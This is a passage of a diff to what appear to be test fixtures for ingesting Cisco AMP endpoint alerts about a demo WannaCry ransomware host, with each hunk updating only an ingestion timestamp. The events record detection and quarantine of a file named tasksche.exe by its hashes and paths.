found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -5726,7 +5726,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764410300Z", + "ingested": "2021-12-14T14:40:45.520885291Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -5802,7 +5802,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764416200Z", + "ingested": "2021-12-14T14:40:45.520885681Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -5878,7 +5878,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764425100Z", + "ingested": "2021-12-14T14:40:45.520886073Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -5954,7 +5954,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764429400Z", + "ingested": "2021-12-14T14:40:45.520886467Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6030,7 +6030,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764433400Z", + "ingested": "2021-12-14T14:40:45.520886977Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6106,7 +6106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764438300Z", + "ingested": "2021-12-14T14:40:45.520887383Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6182,7 +6182,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764443200Z", + "ingested": "2021-12-14T14:40:45.520887777Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6258,7 +6258,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764448500Z", + "ingested": "2021-12-14T14:40:45.520888173Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6334,7 +6334,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764453700Z", + "ingested": "2021-12-14T14:40:45.520888569Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6410,7 +6410,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764457800Z", + "ingested": "2021-12-14T14:40:45.520888971Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6486,7 +6486,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764462500Z", + "ingested": "2021-12-14T14:40:45.520889350Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6583,7 +6583,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764467300Z", + "ingested": "2021-12-14T14:40:45.520889806Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", @@ -6684,7 +6684,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764472800Z", + "ingested": "2021-12-14T14:40:45.520890192Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -6774,7 +6774,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764478100Z", + "ingested": "2021-12-14T14:40:45.520890597Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", @@ -6848,7 +6848,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764482100Z", + "ingested": "2021-12-14T14:40:45.520891005Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", @@ -6920,7 +6920,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764486800Z", + "ingested": "2021-12-14T14:40:45.520891438Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", @@ -6996,7 +6996,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764492700Z", + "ingested": "2021-12-14T14:40:45.520891840Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":377000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064596\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -7072,7 +7072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764498600Z", + "ingested": "2021-12-14T14:40:45.520892224Z", "original": 